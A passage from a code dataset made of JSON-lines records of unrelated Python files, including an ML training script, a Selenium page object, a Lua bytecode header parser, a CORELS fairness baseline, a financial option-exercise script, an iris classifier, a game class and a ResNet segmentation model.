same')\n parser.add_argument('--concats', type=bool,default=True)\n\n parser.add_argument('--z_monot_opt', type=int, default=2)\n parser.add_argument('--end_activation', default='none')\n parser.add_argument('--loss', default='mse')\n parser.add_argument('--lr_schedule', default=False)\n parser.add_argument('--lr', type=float, default=1e-3)\n\n\n parser.add_argument('--weighted_loss',default=False)\n parser.add_argument('--weight_1',type=float,default=0.75)\n parser.add_argument('--weight_2',type=float,default=1.75)\n\n # General\n parser.add_argument('--seed', type=int, default=42, metavar='S', help='random seed')\n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--workers', type=int, default=0)\n args = parser.parse_args()\n\n # GPU setup\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID' # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n if 'Y' in args.outcome:\n\n args.log_root = args.log_root.format(args.treatment.replace('-', '_'), args.outcome,)\n args.path_to_data = args.path_to_data.format(args.treatment.replace('-', '_'), args.outcome, '{}')\n\n else:\n args.log_root = args.log_root.format(args.treatment.replace('-', '_'), args.outcome, args.neighb,)\n args.path_to_data = args.path_to_data.format(args.treatment.replace('-', '_'), args.outcome, args.neighb, '{}')\n\n # Set Randomness\n if args.seed == 0: args.seed = int(np.random.randint(0, 2 ** 32 - 1, (1,)))\n print('seed', args.seed)\n np.random.seed(args.seed)\n tf.random.set_seed(args.seed)\n\n # Set logdirs\n\n\n\n lr_log = str(args.lr).replace('.', '_')\n lr_log = '{}_scheduled'.format(lr_log) if args.lr_schedule else lr_log\n\n confounders = '_'.join(args.confounders)\n multiple = 'multiple' if args.multiple_confounders else 'single'\n z_layer = '{}_{}'.format(multiple, args.z_layer)\n\n if args.multiple_confounders:\n\n z_monotonicity = 'opt_{}'.format(args.z_monot_opt)\n if args.z_monot_opt == 1:\n args.z_monotonicity_base = 0\n else:\n args.z_monotonicity_base = 1\n\n else:\n z_monotonicity = args.z_monotonicity\n args.z_calib_units = len(args.confounders) if 'all' not in args.confounders else 19\n\n if args.oversample:\n oversample = '_oversampled'\n elif args.undersample:\n oversample = '_undersampled'\n else:\n oversample = ''\n if args.weighted_loss:\n loss = '{}_weighted_{}_{}'.format(args.loss,args.weight_1,args.weight_2)\n else:\n loss = args.loss\n conf_to_print = '{}_confs'.format(len(args.confounders)) if 'all' not in args.confounders else 'all'\n calib_units = '{}_{}'.format(args.treat_calib_units,args.uy_hidden_dims)\n if not args.concats :\n conc = ''\n else:\n conc = '_concat'\n if args.cat_treat:\n cat_calib = '_categoric_treat_calib'\n else:\n cat_calib = ''\n layer = '{}_{}{}{}_treat_monot_{}'.format(args.architecture,args.layer,conc,cat_calib,args.treat_monotonicity)\n\n\n\n args.name = args.name.format(layer, args.end_activation, args.uy_layer, args.uy_monotonicity, z_monotonicity,\n z_layer,\n calib_units, args.z_calib_units, lr_log, loss, oversample,\n conf_to_print)\n\n if args.train:\n if not os.path.exists(args.log_root):\n os.makedirs(args.log_root)\n if args.restore:\n oldrunId = args.name\n oldrunpath = os.path.join(args.log_root, oldrunId)\n runId = args.name + '_cont'\n args.runPath = os.path.join(args.log_root, args.name)\n if not os.path.exists(args.runPath):\n os.makedirs(args.runPath)\n elif args.inference_name is not None:\n args.runPath = os.path.join(args.log_root, args.inference_name)\n else:\n args.runPath = os.path.join(args.log_root, 
args.name)\n\n run_train(args)\n\n\n","sub_path":"credit_ordering/train_twin.py","file_name":"train_twin.py","file_ext":"py","file_size_in_byte":21336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35164197","text":"# -*- coding: utf-8 -*-\nfrom core.base_page import BasePage\nimport logging, sys, time\nimport pytest\n# logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n# log = logging.getLogger()\nclass AirportBrief(BasePage):\n def __init__(self, driver):\n \"\"\"\n :type browser: selenium.webdriver.*\n \"\"\"\n self.driver = driver\n self.logger = logging.getLogger(self.__class__.__name__)\n self.timeout = 10\n\n self._station_txt = \"//input[@id='station']\"\n self._briefradius_chk = \"//select[@name='briefRadius']\"\n self._selectAllWeatherReports_chk = \"//input[@id='selectAllWeatherReports']\"\n self._taf_chk = \"//input[@value='TAF.DAT label.taf']\"\n self._ramtaf_chk = \"//input[@value='RAMTAF.DAT label.ramtaf']\"\n self._metar_chk = \"//input[@value='SAO.DAT label.metar']\"\n self._notams_chk = \"//input[@value='NTM-I.DAT label.notams']\"\n self._airep_chk = \"//input[@value='ARP.DAT label.airep']\"\n self._local_forecasts_chk = \"//input[@value='FORECAST.DAT label.local_forecasts']\"\n self._us_notams_chk = \"//input[@value='NTM.DAT label.us_notams']\"\n self._us_pireps_chk = \"//input[@value='PRP.DAT label.us_pireps']\"\n self._us_airmet_chk = \"//input[@value='WAM.DAT label.us_airmet']\"\n self._us_sigmet_chk = \"//input[@value='WSG.DAT label.us_sigmet']\"\n self._us_conv_sigmet_chk = \"//input[@value='WST.DAT label.us_conv_sigmet']\"\n self._us_low_winds_chk = \"//input[@value='FDLOW.DAT label.us_low_winds']\"\n self._us_high_winds_chk = \"//input[@value='FDHIGH.DAT label.us_high_winds']\"\n self._nws_watches_and_warnings_chk = \"//input[@value='NWSWW.DAT label.nws_watches_and_warnings']\"\n self._nws_weather_advisories_chk = \"//input[@value='NWSADV.DAT label.nws_weather_advisories']\"\n self._temperaturedewpoint_chk = \"//input[@value='TemperatureDewPoint Temperature & Dew Point']\"\n self._visibility_chk = \"//input[@value='Visibility Visibility']\"\n self._ceiling_chk = \"//input[@value='CeilingHeight Ceiling Height']\"\n self._clear_all_button_chk = \"//input[@value='Clear All']\"\n self._getairportbrief_chk = \"//input[@id='getAirportBrief']\"\n self._reportorder_radio = \"//input[@name='reportOrder']\"\n self._metarreports_txt = \"//input[@name='metarReports']\"\n self._decodedreports_chk = \"//input[@name='decodedReports']\"\n\n def navigate_to_airport_brief(driver):\n driver.logger.info('Navigate to Airport Brief tab')\n if not 'i18n_button_currenttab_td_middle' in driver.get_attribute(\"//SPAN[text()='Home']/..\",\n \"class\"):\n driver.click(\"//SPAN[text()='Home']\")\n if driver.get_attribute(\"//a[contains(@href,'/common/link.do?contentId=201782')]\", \"class\") in '':\n driver.click(\"//a[contains(@href,'/common/link.do?contentId=201782')]\")\n for i in range(10):\n if driver.is_element_present(\"//input[@id='getAirportBrief']\"):\n return True\n else:\n time.sleep(2)\n","sub_path":"pages/airport_brief_page.py","file_name":"airport_brief_page.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404434579","text":"class BinaryChunkHeader:\n LUA_SIGNATURE = bytes(b'\\x1bLua')\n LUAC_VERSION = 0x53\n LUAC_FORMAT = 0x0\n LUAC_DATA = bytes(b'\\x19\\x93\\r\\n\\x1a\\n')\n CINT_SIZE = 4\n CSIZET_SIZE = 8\n 
INST_SIZE = 4\n LUA_INT_SIZE = 8\n LUA_NUMBER_SIZE = 8\n LUAC_INT = 0x5678\n LUAC_NUM = 370.5\n\n def __init__(self, br):\n self.signature = br.read_bytes(4)\n self.version = br.read_uint8()\n self.format = br.read_uint8()\n self.luac_data = br.read_bytes(6)\n self.cint_size = br.read_uint8()\n self.csizet_size = br.read_uint8()\n self.inst_size = br.read_uint8()\n self.lua_int_size = br.read_uint8()\n self.lua_number_size = br.read_uint8()\n self.luac_int = br.read_uint64()\n self.luac_num = br.read_double()\n\n def check(self):\n assert(self.signature == BinaryChunkHeader.LUA_SIGNATURE)\n assert(self.version == BinaryChunkHeader.LUAC_VERSION)\n assert(self.format == BinaryChunkHeader.LUAC_FORMAT)\n assert(self.luac_data == BinaryChunkHeader.LUAC_DATA)\n assert(self.cint_size == BinaryChunkHeader.CINT_SIZE)\n assert(self.csizet_size == BinaryChunkHeader.CSIZET_SIZE)\n assert(self.inst_size == BinaryChunkHeader.INST_SIZE)\n assert(self.lua_int_size == BinaryChunkHeader.LUA_INT_SIZE)\n assert(self.lua_number_size == BinaryChunkHeader.LUA_NUMBER_SIZE)\n assert(self.luac_int == BinaryChunkHeader.LUAC_INT)\n assert(self.luac_num == BinaryChunkHeader.LUAC_NUM)\n\n def dump(self):\n print('signature: ', self.signature)\n print('version: ', self.version)\n print('format: ', self.format)\n print('luac_data: ', self.luac_data)\n print('cint_size: ', self.cint_size)\n print('csizet_size: ', self.csizet_size)\n print('inst_size: ', self.inst_size)\n print('lua_int_size: ', self.lua_int_size)\n print('lua_number_size: ', self.lua_number_size)\n print('luac_int: ', hex(self.luac_int))\n print('luac_num: ', self.luac_num)\n print()\n","sub_path":"code/python/ch08/src/binary_chunk_header.py","file_name":"binary_chunk_header.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283297203","text":"\"\"\"Manually specified (i.e. not learned) models.\"\"\"\nimport numpy as np\nimport pandas as pd\n\nfrom ethicml.common import implements\nfrom ethicml.utility import DataTuple, Prediction, TestTuple\n\nfrom .in_algorithm import InAlgorithm\n\n__all__ = [\"Corels\"]\n\n\nclass Corels(InAlgorithm):\n \"\"\"CORELS (Certifiably Optimal RulE ListS) algorithm for the COMPAS dataset.\n\n This algorithm uses if-statements to make predictions. 
It only works on COMPAS with s as sex.\n\n From this paper: https://arxiv.org/abs/1704.01701\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Constructor of the class.\"\"\"\n super().__init__(name=\"CORELS\")\n\n @implements(InAlgorithm)\n def run(self, _: DataTuple, test: TestTuple) -> Prediction:\n if test.name is None or \"Compas\" not in test.name or \"sex\" not in test.s.columns:\n raise RuntimeError(\"The Corels algorithm only works on the COMPAS dataset\")\n age = test.x[\"age-num\"].to_numpy()\n priors = test.x[\"priors-count\"].to_numpy()\n sex = test.s[\"sex\"].to_numpy()\n male = 1\n condition1 = (age >= 18) & (age <= 20) & (sex == male)\n condition2 = (age >= 21) & (age <= 23) & (priors >= 2) & (priors <= 3)\n condition3 = priors > 3\n pred = np.where(condition1 | condition2 | condition3, np.ones_like(age), np.zeros_like(age))\n return Prediction(hard=pd.Series(pred))\n","sub_path":"ethicml/algorithms/inprocess/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304405080","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom seb.plot import Plot, Drawing, Plot3D, Container, Animation\n\nif __name__ == '__main__':\n x = np.linspace(-7, 7, 50)\n fn = lambda x, y: -np.sin(x/2.0) + y**2\n\n # Setup 3D Plot\n p = Plot3D('3D Rotation')\n p.projection(x, np.cos(x + 0.5), fn)\n p.set_axis('x axis', 'y axis', 'z axis')\n p.set_camera(45, 66)\n\n # 3D Rotation\n a3d = Animation()\n a3d.rotate_3d(p)\n a3d.save('./rot3d.gif')\n # a3d.save('./rot3d.mp4')\n\n # Setup Scatter Graph\n x = np.linspace(-7, 7, 30)\n q = Plot('Scatter (PuBuGn_d)', 500, 500, 100)\n q.canvas.axis('off')\n\n # Scatter animation\n def fn(d):\n q.scatter(d, np.cos(0.7+ d))\n return q\n a = Animation()\n a.anim_fn(fn, x)\n a.save('scatter.gif')\n # a.save('test.mp4')\n\n","sub_path":"scripts/seb/tests/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400336397","text":"\"\"\" Compiled: 2020-09-18 10:38:51 \"\"\"\n\n#__src_file__ = \"extensions/expiration/etc/FExerciseAssign.py\"\n#----------------------------------------------------------------------------\n# (c) Copyright 2020 SunGard Front Arena. All rights reserved.\n#----------------------------------------------------------------------------\n\"\"\"----------------------------------------------------------------------------\nMODULE\n FExerciseAssign - Script for exercising or assigning positions in options\n and warrants that are not handled manually or from an exchange\n\nDESCRIPTION\n This module exercises or assigns positions in options and warrants that\n are not automatically handled from an exchange or manually exercised, such\n as OTC instruments, instruments from other markets than EUREX, or American\n type derivatives.\n\n A. Cash settled instruments\n If the derivative is in-the-money and Cash settled, the derivative is\n closed at the intrinsic value, i.e. at\n price = settlement price - strike price.\n The premium is set accordingly.\n\n B. Physically settled instruments\n If the derivative is in-the-money and Physically settled, trades in both\n the underlying security and the derivative are entered. There are 2 modes\n to choose between (this is chosen in the variable window):\n\n 1. 
Market mode:\n The trade in the underlying security is done to the market price (the\n settlement price). The closing derivative trade carries the difference\n between the strike price and the settlement price, i.e.\n price = settlement price - strike price.\n\n 2. Strike mode:\n The trade in the underlying security is done at the strike price. The\n closing derivative trade gets the price and premium zero.\n\n Trade status is set to Exercise for long positions and Assign for short.\n\n NOTE! Abandon is performed in this script if the derivative is\n out-of-the-money. In this case the trade is made at price and premium 0,\n and the trade status is set to Abandon.\n\n NOTE! This script is not intended to run as a batch job.\n\nENDDESCRIPTION\n----------------------------------------------------------------------------\"\"\"\n\n#Import Front modules\nimport acm\nimport FBDPGui\nimport importlib\nimportlib.reload(FBDPGui)\nimport FBDPCustomPairDlg\n\n\n# Tool Tip\nttDoExeAss = ('Generate exercise and assignment transactions to close '\n 'in-the-money positions')\nttDoAbandon = ('Generate abandon transactions to close out-of-the-money '\n 'positions')\nttsettle_price = ('If defined, this price will be used instead of the '\n 'underlying\\'s settlement-price per expiration date. Should be '\n 'expressed in the quote type of the underlying.')\ntttrades = 'Select the positions that should be handled by the script'\nttsettlemarket = ('The underlying\\'s settlement price will primarily be '\n 'taken from this Market')\nttmode = ('Defines at what price the derivative position should be closed, '\n 'and the corresponding underlying trade opened')\nttInstrument = ('Specify the instruments that will be processed.')\nttCloseAll = ('Close all the positions if checked.')\nttExerciseIfATM = (\"Exercise if the option is 'At The Money'\")\nttPartialExercise = ('Specify the percentage of partial exercise')\n\nvalid_modes = ['Market', 'Strike']\n\n# Fill in smart default values\nsmarkets = map(lambda x: x.Name(), acm.FMTMMarket.Select(''))\n\n\nq = FBDPGui.insertTrades(expiryEnd='0d', expiryStart='1900-01-01')\n\ndef customDealPkgDialog(shell, params):\n customDlg = \\\n FBDPCustomPairDlg.SelectDealPackagesCustomDialog(shell, params)\n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\ndefaultMode = 'Strike'\ntry:\n import FBDPHook\n importlib.reload(FBDPHook)\n defaultMode = FBDPHook.exercise_mode(1) and 'Strike' or 'Market'\nexcept:\n pass\n\n\nclass FPositionsAndInstrumentsVariables(FBDPGui.FxPositionVariables):\n\n def __init__(self, *ael_variables):\n\n ttInstrument = ('Specify the instruments that will be processed.')\n ttDealPackage = ('Specify the deal package oid that will be' \\\n 'processed.')\n\n # [VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n self.createVariable(\n ['trades',\n 'Positions_Positions',\n 'FTrade', None, q,\n 0, 1, tttrades, None, 0])\n self.createVariable(\n ['instruments',\n 'Instrument_Positions',\n 'FInstrument', None, None,\n 0, 1, ttInstrument, self.object_cb])\n self.createVariable(\n ['dealpackage',\n 'Deal Package_Positions',\n 'string', \"\", \"\",\n 0, 1, ttDealPackage, self.object_cb, 1,\n customDealPkgDialog])\n\n FBDPGui.FxPositionVariables.__init__(self, *ael_variables)\n\n def object_cb(self, index, fieldValues):\n tt = 'You can only select one type of object.'\n for field in (self.TradeQuery, self.TradeFilter,\n self.TradingPortfolios, 
self.instruments, self.dealpackage):\n if self[index] != field:\n field.enable(not fieldValues[index], tt)\n\n if (self.instruments.isEnabled() and\n fieldValues[self.instruments.sequenceNumber]\n or self.TradingPortfolios.isEnabled()\n and fieldValues[self.TradingPortfolios.sequenceNumber]):\n self.instruments.enable(1, tt)\n self.TradingPortfolios.enable(1, tt)\n self.TradeQuery.enable(0, tt)\n self.TradeFilter.enable(0, tt)\n self.dealpackage.enable(0, tt)\n elif (self.dealpackage.isEnabled() and\n fieldValues[self.dealpackage.sequenceNumber]):\n self.instruments.enable(0, tt)\n self.TradingPortfolios.enable(0, tt)\n self.TradeQuery.enable(0, tt)\n self.TradeFilter.enable(0, tt)\n\n return fieldValues\n\n\nael_variables = FPositionsAndInstrumentsVariables(\n # [VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n ['DoExeAss',\n 'Do Exercise Assign',\n 'int', ['1', '0'], 1,\n 1, 0, ttDoExeAss],\n ['DoAbandon',\n 'Do Abandon',\n 'int', ['1', '0'], 1,\n 1, 0, ttDoAbandon],\n ['close_all',\n 'Close All Positions',\n 'int', ['1', '0'], 1,\n 1, 0, ttCloseAll],\n ['exercise_if_ATM',\n 'Exercise if ATM',\n 'int', ['1', '0'], 0,\n 0, 0, ttExerciseIfATM],\n ['partial_exercise',\n 'Partially Exercise',\n 'string', None, '100',\n 0, 0, ttPartialExercise],\n ['settle_price',\n 'Settle Price',\n 'string', '', '',\n 0, None, ttsettle_price],\n ['settlemarket',\n 'Name of Settlement Market',\n 'string', smarkets, FBDPGui.getMtMMarket(),\n 2, None, ttsettlemarket],\n ['mode',\n 'Mode',\n 'string', valid_modes, defaultMode,\n 2, None, ttmode])\n\n\ndef ael_main(dictionary):\n\n import FBDPString\n importlib.reload(FBDPString)\n ScriptName = \"Exercise Assign\"\n import FBDPCurrentContext\n FBDPCurrentContext.CreateLog(ScriptName,\n dictionary['Logmode'],\n dictionary['LogToConsole'],\n dictionary['LogToFile'],\n dictionary['Logfile'],\n dictionary['SendReportByMail'],\n dictionary['MailList'],\n dictionary['ReportMessageType'])\n\n import FBDPCommon\n importlib.reload(FBDPCommon)\n import FBDPRollback\n importlib.reload(FBDPRollback)\n import FBDPCalculatePosition\n importlib.reload(FBDPCalculatePosition)\n import FBDPInstrument\n importlib.reload(FBDPInstrument)\n import FExeAssPerform\n importlib.reload(FExeAssPerform)\n\n dictionary['trades'] = FBDPCommon.convertEntityList(dictionary['trades'],\n dictionary)\n dictionary['Positions'] = dictionary['trades']\n\n FBDPGui.setPortfolioGrouper(dictionary)\n FBDPCommon.execute_script(FExeAssPerform.perform_exercise_assign,\n dictionary)\n","sub_path":"Extensions/Default/FPythonCode/FExerciseAssign.py","file_name":"FExerciseAssign.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249369689","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom IPython.core.display import Image, display\ndisplay(Image(r'c:\\users\\avinash.t\\iris_setosa.jpg'))\nprint('iris_setosa\\n')\ndisplay(Image(r'c:\\users\\avinash.t\\Iris_versicolor.jpg'))\nprint('iris_versicolor\\n')\ndisplay(Image(r'c:\\users\\avinash.t\\Iris_virginica.jpg'))\nprint('iris_virginica\\n')\n\n\n# In[2]:\n\n\nfrom sklearn.datasets import load_iris\niris = load_iris()\niris.keys()\n\n\n# In[3]:\n\n\niris.data.shape\n\n\n# In[4]:\n\n\niris.feature_names\n\n\n# In[5]:\n\n\niris.target_names\n\n\n# In[6]:\n\n\niris.target\n\n\n# In[7]:\n\n\n##Logisitic Regression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import 
metrics\nmodel = LogisticRegression()\nmodel.fit(iris.data,iris.target)\n# expected outcome\nexpectedOutcome = iris.target\npredictedValue = model.predict(iris.data)\n\n\n# In[8]:\n\n\nprint(metrics.classification_report(expectedOutcome, predictedValue))\n\n\n# In[9]:\n\n\nprint(metrics.confusion_matrix(expectedOutcome, predictedValue))\n\n\n# In[14]:\n\n\n# Naive Bayes algorithm\nfrom sklearn.naive_bayes import GaussianNB\nmodel = GaussianNB()\nmodel.fit(iris.data,iris.target)\nexpected = iris.target\npredicted = model.predict(iris.data)\nprint(metrics.confusion_matrix(expected, predicted))\nprint(metrics.accuracy_score(expected,predicted))\n\n","sub_path":"machineLearining/2_Irish_Flower_Machine_Learning/Visual_Iris_navie_Base.py","file_name":"Visual_Iris_navie_Base.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403391815","text":"import random\nfrom hw8_1720387.Person import Person\nclass Hero(Person):\n def __init__(self,name='hero', level=1, maxhp=100, race='human'): # initialise the hero\n super().__init__(name,level,maxhp)\n # define the race and the agility\n self._race = race\n if self._race == 'human': # human\n self._flex = 0.4\n elif self._race == 'elves': # elf\n self._flex = 0.8\n\n def get_race(self): # get the race\n return self._race\n\n def get_flex(self): # get the agility\n return self._flex\n\n def defence(self, hurt):\n # depending on agility, the hero may dodge the opponent's attack\n luck = random.random()\n if luck >= self.get_flex():\n self.set_hp(hurt)\n print('Damage notice: hero {} took {} points of damage!'.format(self.get_name(),hurt))\n else:\n print('You successfully dodged the attack!')\n\n def attack(self,monster):\n # based on the current level, draw a random number in a given range as the attack points\n # monster: the target being attacked\n if self.get_level() == 1:\n heroHurt = random.randint(0,10)\n elif self.get_level() ==2:\n heroHurt = random.randint(0, 20)\n elif self.get_level() ==3:\n heroHurt = random.randint(0, 30)\n monster.defence(heroHurt) # hero damage\n\n def upLevel(self):\n # level up: add to max HP and restore HP\n self.set_level(1) # gain one level\n self.set_maxhp(10) # note: max HP must be raised before HP is restored\n self.reply_hp()\n print('Level-up notice: hero {} reached level {}!'.format(self.get_name(),self.get_level()))\n\n","sub_path":"homework8/Group7/hw8_1720387/Hero.py","file_name":"Hero.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562145937","text":"# TODO verify the model\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport sys\nfrom utils.loss import *\nfrom utils.metrics import *\nfrom tensorflow.contrib.layers.python.layers import utils\nfrom tensorflow.contrib.layers.python.layers import initializers\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef update_argparser(parser):\n parser.set_defaults(\n train_steps=50000,\n learning_rate=((10000, 40000), (0.001, 0.0001,0.00001)),\n save_checkpoints_steps=1000,\n )\n\n'''\ndef update_argparser(parser):\n parser.set_defaults(\n train_steps=40000,\n learning_rate=((20000,30000), (0.0001, 0.00001,0.000001)),\n save_checkpoints_steps=1000,\n )\n'''\n\nclass ResNet_segmentation(object):\n \"\"\"\n Original ResNet-101 ('resnet_v1_101.ckpt')\n \"\"\"\n def __init__(self, inputs, args, phase, output_stride, encoder_name):\n if encoder_name not in ['res101', 'res50']:\n print('encoder_name ERROR!')\n print(\"Please input: res101, res50\")\n sys.exit(-1)\n self.encoder_name = encoder_name\n self.inputs = inputs\n self.num_classes = args.num_classes\n self.phase = phase # train (True) or test (False), for BN layers 
in the decoder\n self.multi_grid = args.multi_grid\n self.output_stride = output_stride\n # The current_stride variable keeps track of the effective stride of the\n # activations. This allows us to invoke atrous convolution whenever applying\n # the next residual unit would result in the activations having stride larger\n # than the target output_stride.\n self.current_stride = 1\n self.rate = 1 # The atrous convolution rate parameter.\n self.build_network()\n \n def build_network(self):\n self.encoding = self.build_encoder()\n self.outputs = self.build_decoder(self.encoding)\n \n def build_encoder(self, outputs_collections = None):\n scope_name = 'resnet_v1_101' if self.encoder_name == 'res101' else 'resnet_v1_50'\n with tf.variable_scope(scope_name):\n if self.output_stride is not None:\n if self.output_stride % 4 != 0:\n raise ValueError('The output_stride needs to be a multiple of 4.')\n self.output_stride /= 4\n\n net = self._start_block()\n net = tf.layers.max_pooling2d(net, pool_size = 3, strides=2, padding='same', name='pool1')\n\n # block 1\n with tf.variable_scope('block1'):\t\n for i in range(1, 3):\n with tf.variable_scope('unit_%d' % i):\n net = self._bottleneck_resblock(net, 256, 64, stride=1, unit_rate=1)\n with tf.variable_scope('unit_3'):\n net = self._bottleneck_resblock(net, 256, 64, stride=2, unit_rate=1)\n\n # block 2\n with tf.variable_scope('block2', values=[net]):\n for i in range(1, 4):\n with tf.variable_scope('unit_%d' % i, values=[net]):\n net = self._bottleneck_resblock(net, 512, 128, stride=1, unit_rate=1)\n with tf.variable_scope('unit_4', values=[net]):\n net = self._bottleneck_resblock(net, 512, 128, stride=2, unit_rate=1)\n \n '''\n # block 3, has nonlocal block\n with tf.variable_scope('block3', values=[net]):\n for i in range(1, 23):\n with tf.variable_scope('unit_%d' % i, values=[net]):\n net = self._bottleneck_resblock(net, 1024, 256, stride=1, unit_rate=1)\n with tf.variable_scope('unit_23', values=[net]):\n net = self._bottleneck_resblock(net, 1024, 256, stride=2, unit_rate=1)\n '''\n #block 3, has nonlocal block\n net = self._res_stage_nonlocal(net, 1024, stride = 2, block_id=3, num_blocks = 23, nonlocal_mod = 7, apply_nonlocal = True)\n\n # block 4\n with tf.variable_scope('block4'):\n for i in range(1, 4):\n with tf.variable_scope('unit_%d' % i):\n net = self._bottleneck_resblock(net, 2048, 512, stride=1, unit_rate = self.multi_grid[i-1])\n \n if self.output_stride is not None and self.current_stride != self.output_stride:\n raise ValueError('The target output_stride cannot be reached.')\n return net\n \n def build_decoder(self, encoding):\n with tf.variable_scope('decoder'):\n net = self._ASPP(encoding, \"ASPP_layer\", depth=256)\n net = self._conv2d(net, self.num_classes, 1, activation_fn=None, use_batch_norm=False, name='logits')\n\n size = tf.shape(self.inputs)[1:3]\n # resize the output logits to match the labels dimensions\n outputs = tf.image.resize_bilinear(net, size)\n return outputs\n\n\t# blocks\n def _start_block(self):\n \"\"\"Gets root_block_fn for beta variant.\n ResNet-v1 beta variant modifies the first original 7x7 convolution to three\n 3x3 convolutions.\n Args:\n net: A tensor of size [batch, height, width, channels], input to the model.\n Returns:\n A tensor after three 3x3 convolutions.\n \"\"\"\n net = self._conv2d_same(self.inputs, 64, 3, stride=2, scope='conv1_1')\n net = self._conv2d_same(net, 64, 3, stride=1, scope='conv1_2')\n net = self._conv2d_same(net, 128, 3, stride=1, scope='conv1_3')\n return net\n\n def 
_bottleneck_resblock(self, net, depth, depth_bottleneck, stride, unit_rate):\n \"\"\"Wrap up the bottleneck function\n \"\"\"\n # If we have reached the target output_stride, then we need to employ\n # atrous convolution with stride=1 and multiply the atrous rate by the\n # current unit's stride for use in subsequent layers.\n if self.output_stride is not None and self.current_stride > self.output_stride:\n raise ValueError('The target output_stride cannot be reached.')\n if self.output_stride is not None and self.current_stride == self.output_stride:\n net = self.bottleneck(net, depth, depth_bottleneck, stride=1, unit_rate=unit_rate, rate=self.rate)\n self.rate *= stride\n else:\n net = self.bottleneck(net, depth, depth_bottleneck, stride, unit_rate, rate=1)\n self.current_stride *= stride\n \n return net\n\n def bottleneck(self,\n inputs,\n depth,\n depth_bottleneck,\n stride,\n unit_rate=1,\n rate=1,\n outputs_collections=None,\n scope=None):\n \"\"\"Bottleneck residual unit variant with BN after convolutions.\n This is the original residual unit proposed in [1]. See Fig. 1(a) of [2] for\n its definition. Note that we use here the bottleneck variant which has an\n extra bottleneck layer.\n When putting together two consecutive ResNet blocks that use this unit, one\n should use stride = 2 in the last unit of the first block.\n Args:\n inputs: A tensor of size [batch, height, width, channels].\n depth: The depth of the ResNet unit output.\n depth_bottleneck: The depth of the bottleneck layers.\n stride: The ResNet unit's stride. Determines the amount of downsampling of\n the units output compared to its input.\n unit_rate: An integer, unit rate for atrous convolution.\n rate: An integer, rate for atrous convolution.\n outputs_collections: Collection to add the ResNet unit output.\n scope: Optional variable_scope.\n Returns:\n The ResNet unit's output.\n \"\"\"\n with tf.variable_scope(scope, 'bottleneck_v1', [inputs]):\n depth_in = utils.last_dimension(inputs.get_shape(), min_rank=4)\n if depth == depth_in:\n shortcut = self._subsample(inputs, stride, 'shortcut')\n else:\n shortcut = self._conv2d(\n inputs,\n depth,\n 1,\n stride,\n activation_fn = None,\n name='shortcut')\n\n residual = self._conv2d(inputs, depth_bottleneck, 1, stride=1, name='conv1')\n\n residual = self._conv2d_same(residual, depth_bottleneck, 3, stride, rate=rate*unit_rate, scope='conv2')\n \n residual = self._conv2d(residual, depth, 1, stride=1, activation_fn=None, name='conv3')\n \n output = tf.nn.relu(shortcut + residual)\n\n return output\n\n\n def _ASPP(self, net, scope, depth=256):\n \"\"\"\n ASPP consists of (a) one 1×1 convolution and three 3×3 convolutions with rates = (6, 12, 18) when output stride = 16\n when output stride = 8, rates are doubled\n (all with 256 filters and batch normalization), and (b) the image-level features as described in https://arxiv.org/abs/1706.05587\n :param net: tensor of shape [BATCH_SIZE, WIDTH, HEIGHT, DEPTH]\n :param scope: scope name of the aspp layer\n :return: network layer with aspp applyed to it.\n \"\"\"\n # get the true output_stride\n self.output_stride *= 4\n\n if self.output_stride == 16:\n rates = [6,12,18]\n elif self.output_stride == 8:\n rates = [12,24,36]\n\n with tf.variable_scope(scope):\n feature_map_size = tf.shape(net)\n\n # apply global average pooling\n image_level_features = tf.reduce_mean(net, [1, 2], name='image_level_global_pool', keepdims=True)\n image_level_features = self._conv2d(image_level_features, depth, 1, activation_fn=None, 
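# note: fine_tune_batch_norm=True on this branch means the BN is_training flag follows self.phase (see _conv2d below)\n 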
